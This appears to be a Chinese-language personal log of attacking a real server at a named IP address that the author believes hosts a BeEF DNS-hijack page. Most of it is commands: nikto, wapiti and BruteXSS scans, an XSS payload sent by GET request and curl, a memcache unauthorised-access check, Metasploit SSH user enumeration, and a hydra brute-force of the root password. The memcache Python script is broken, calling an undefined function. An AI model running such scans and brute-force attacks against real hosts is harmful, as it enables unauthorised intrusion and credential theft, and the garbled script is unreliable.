xss漏洞发现检测日志

今天发现dns劫持beef框架下的一个英国服务器架设的dns劫持xss漏洞

劫持chrome浏览器dns转向franceinfo.fr 法国电视新闻信息网

http://178.62.118.98/qfhwkydenw/b.php  网页已下载分析。

nikto -h 没有检测到nikto -h http://178.62.118.98/qfhwkydenw/ -o result.html

nikto -h http://178.62.118.98/qfhwkydenw/ -Plugins -o result.html

通过wapiti -u http://178.62.118.98/qfhwkydenw/ -o wapiti_result -f html 检测漏洞

XSS vulnerability found via injection in the parameter call

GET /qfhwkydenw/b.php?call=%3CScRiPt%3Ealert%28%27wdyko7vcfp%27%29%3C%2FsCrIpT%3E HTTP/1.1
Host: 178.62.118.98

curl "http://178.62.118.98/qfhwkydenw/b.php?call=%3CScRiPt%3Ealert%28%27wdyko7vcfp%27%29%3C%2FsCrIpT%3E"

其次检测 git clone https://github.com/lvwuwei/BruteXss

python brutexss.py -m get -u http://178.62.118.98/qfhwkydenw/ -t wordlist.txt

nmap -p- 178.62.118.98 再次扫描所有端口 发现 11211/tcp filtered memcache 可尝试

MEMCACHE未授权访问漏洞利用及修复  telnet 178.62.118.98 11211 或nc -vv <target> 11211，提示连接成功表示漏洞存在。

0x02 Python未授权访问脚本

#! /usr/bin/env python

# _*_ coding:utf-8 _*_
def Memcache_check(ip, port=11211, timeout=5): try: socket.setdefaulttimeout(timeout) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, int(port))) s.send("stats\r\n") result = s.recv(1024) if "STAT version" in result: print '[+] Memcache Unauthorized: ' +ip+':'+str(port) except Exception, e: pass
if __name__ == '__main__': Elasticsearch_check("127.0.0.1") //代码elasticsearch not foud
memcache漏洞具体查看 可以nmap 批量扫描11211端口

最后发现我的检测 对方关闭80和443端口 最后只剩下22端口 于是

发现22端口使用auxiliary/scanner/ssh/ssh_enumusers 然后set rhosts和set USER_FILE /root/seclists/Usernames/top-usernames-shortlist.txt （seclists字典需要git clone） run检测到用户名root

用户ssh暴力破解

hydra -t 16 -l root -P /usr/share/wordlists/rockyou.txt -vV 178.62.118.98 ssh

破解中等待结果……

因太多访问猜测，对方换掉系统从linux到windows开发端口为 并且禁止ping

Not shown: 996 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49154/tcp open unknown